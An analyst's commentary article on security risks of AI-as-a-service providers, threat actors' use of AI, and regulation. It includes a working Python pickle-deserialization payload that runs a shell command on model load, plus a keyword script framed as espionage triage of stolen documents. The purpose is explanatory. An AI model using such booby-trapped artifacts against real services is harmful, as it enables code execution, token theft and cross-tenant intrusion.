
Recent reporting reveals that artificial intelligence-as-a-service (AIaaS) providers are susceptible to hostile cyber actors seeking “to escalate privileges, gaining cross-tenant access to other customers’ models, and take control over continuous integration and continuous deployment pipelines.” As highlighted in the article, the impact could be severe should threat actors gain access to, and potentially manipulate, the numerous private AI models and apps hosted by AIaaS suppliers. This revelation highlights the possibility of threat actors targeting and exploiting a new supply chain vector, executing a series of attacks to extend access into other networks, steal information, manipulate data, and facilitate a variety of other operations depending on the actors’ intent.
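To make the supply-chain risk concrete, consider one well-documented class of weakness in services that load user-supplied model artifacts: unsafe deserialization. The minimal Python sketch below is illustrative only and is not a reconstruction of the reported attack; the class name and the harmless echoed command are invented. It shows why loading an untrusted, pickle-serialized “model” can hand an attacker code execution on shared infrastructure, the kind of foothold from which cross-tenant and CI/CD pipeline attacks could proceed.

```python
import pickle

# Illustrative sketch of unsafe model deserialization (an assumed vector,
# not the specific reported research). pickle calls __reduce__ while
# loading, so a crafted artifact can specify arbitrary code to run on load.
class MaliciousModel:
    def __reduce__(self):
        import os
        # A real payload might steal service tokens or pivot to other
        # tenants; this one just proves code execution at load time.
        return (os.system, ("echo pwned: code ran during model load",))

# Attacker side: serialize the booby-trapped "model" for upload.
payload = pickle.dumps(MaliciousModel())

# Vulnerable service side: merely loading the artifact runs the payload.
pickle.loads(payload)
```

This is part of why model-hosting platforms increasingly favor non-executable formats such as safetensors and scan uploaded artifacts before serving them.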

AIaaS is another avenue through which AI is quickly being incorporated into business operations. According to an outlook report by CompTIA, AI is viewed favorably by the companies surveyed, with 22% aggressively pursuing integration, 33% maintaining limited integration, and 45% actively exploring potential uses of the technology. Per the report, the reasons for AI integration are diverse: some companies polled are looking to AI to improve operations, others to bolster cybersecurity and fraud management, while strengthening customer relationship management, content production, accounting assistance, and supply chain operations represented the majority of respondents’ goals for the technology. Vendors offer AIaaS to provide organizations AI tools and capabilities while minimizing the resource investment required of their customers. Simply put, these vendors fill a void, offering cost-effective AI solutions and, in doing so, expanding AI integration into smaller businesses.

The potential downside of AI has been, and continues to be, debated, particularly how hostile actors can leverage and exploit the technology to enable attacks of varying impact. Increasing reports show threat actors moving from the hypothetical to the operational with respect to leveraging AI in their cyber activities. Beyond the variety of ways generative technologies can be used to craft social engineering lures, write malicious code, and the like, one cybersecurity company revealed a proof-of-concept tool dubbed Red Reaper capable of analyzing data and meticulously identifying sensitive information for espionage or other criminal purposes. While cybercriminal use of AI is worrisome enough, the power AI can lend a nation state is downright frightening. Notably, according to reporting from Microsoft, China has been executing influence campaigns leveraging AI-generated and AI-enhanced content, including video, memes, and audio, to advance its strategic narratives. Per Microsoft, this was the first time it had observed a nation state using AI to influence a foreign election, and it is likely only the tip of the iceberg. Sure, AI is being incorporated into defenses, but attacks instill more fear than any measure designed to stop them.
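To give a rough sense of what automated sensitive-data triage looks like in principle, the hypothetical Python sketch below ranks a document corpus by keyword-category hits. It is not a reconstruction of Red Reaper’s actual methods; the categories, patterns, and sample texts are invented for illustration, and a real tool would apply far richer, LLM-driven analysis at scale.

```python
import re

# Hypothetical sketch of AI-assisted espionage triage: surface the most
# sensitive-looking documents from a large corpus. Categories, patterns,
# and samples are invented; real tooling would be far more sophisticated.
SENSITIVE_PATTERNS = {
    "credentials": re.compile(r"\b(password|api[_ ]?key|token)\b", re.I),
    "legal": re.compile(r"\b(settlement|subpoena|litigation)\b", re.I),
    "financial": re.compile(r"\b(wire transfer|acquisition|invoice)\b", re.I),
}

def score_document(text: str) -> int:
    """Count how many sensitive categories a document touches."""
    return sum(1 for pattern in SENSITIVE_PATTERNS.values() if pattern.search(text))

docs = [
    "Reminder: team lunch on Friday.",
    "Attached: invoice and wire transfer details for the acquisition.",
    "Temp password and API key below; rotate them after the subpoena review.",
]

# Highest-scoring documents surface first, mimicking how automation lets
# an intruder locate the most valuable data in a mass of stolen material.
for doc in sorted(docs, key=score_document, reverse=True):
    print(score_document(doc), doc)
```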

But there is a cautionary tale to be told here as well. Much has been made of the extent to which AI can revolutionize every facet of society, eventually replacing humans in jobs and even thinking creatively on its own, as demonstrated in 2016 when the AlphaGo AI surprised and defeated the reigning Go champion. This is not an end-of-the-world development; far from it. But it does demonstrate that when talking about the power and potential of AI technology, more needs to be understood, both about its possibilities to benefit society and about the problems it can cause if its development is not monitored and tracked.

The U.S. Department of State commissioned a report on AI that warned the technology could pose an “extinction-level threat,” specifically referencing its rapidly expanding capabilities, its weaponization, and the high risk of losing control over the technology as catalysts for this worst-case scenario. Granted, existential threats have become common parlance of government to try to gaslight issues (e.g., climate change, political opponents, and white supremacy, to name a few), but the unbridled rollout of AI without a plan can certainly lead to problems. Of paramount concern are the similarities of the technology to nuclear weapons development, prompting calls for rigorous regulation to prevent rampant and irresponsible proliferation.

The latter point cannot be overstated, as the history of technological development has always put security considerations on the back burner, and as data breaches have revealed, organizations are all too willing to pass the buck rather than take responsibility. Class action lawsuits in response to data breaches are becoming more frequent according to a 2024 report, although it is debatable whether this is influencing how companies address their security. A recent Executive Order on AI and a non-binding international agreement with 18 other countries to keep AI systems secure by design are positive acknowledgements of what needs to be done, but true understanding will emerge only when policy is implemented, carried out, and measured. U.S. AI developers may follow the Executive Order, but foreign companies are not bound by it, nor are they obligated to strictly adhere to what has been laid out in the agreement. These efforts risk becoming symbolic gestures more than legitimate regulation.

The U.S. government is promoting a more optimistic view of the race between defenders and attackers with respect to their use of AI. According to FBI and DHS officials, generative AI has afforded more benefits to cybersecurity practitioners than to hostile actors. While this sounds positive, if true, any gap between the two will likely close quickly, especially for the more cyber-savvy state and nonstate actors who, as the article states, are currently “experimenting” with the technology. I would argue that “experimenting” conveys the wrong sense of what these actors are doing, as they have consistently demonstrated an ability to capitalize on IT developments, knowing full well that the quicker they operationalize a technology, the better positioned they will be to refine how it is used against slower-moving defenders.

One big takeaway is that the competition to effectively leverage AI is still taking shape, and what’s happening in the current environment with respect to AI development, company responsibility, and the international community’s role in its rollout will be formative in how the race concludes. The best part of it is that humans have a lot of say in how that happens. At least, for now.

AI versus AI will be the central drama, but the outcome depends profoundly on human choices around how intelligently we govern this technology. 


About the Author

Emilio Iasiello

Emilio Iasiello has nearly 20 years’ experience as a strategic cyber intelligence analyst, supporting US government civilian and military intelligence organizations, as well as the private sector. He has delivered cyber threat presentations to domestic and international audiences and has published extensively in such peer-reviewed journals as Parameters, Journal of Strategic Security, the Georgetown Journal of International Affairs, and the Cyber Defense Review, among others. All comments and opinions expressed are solely his own.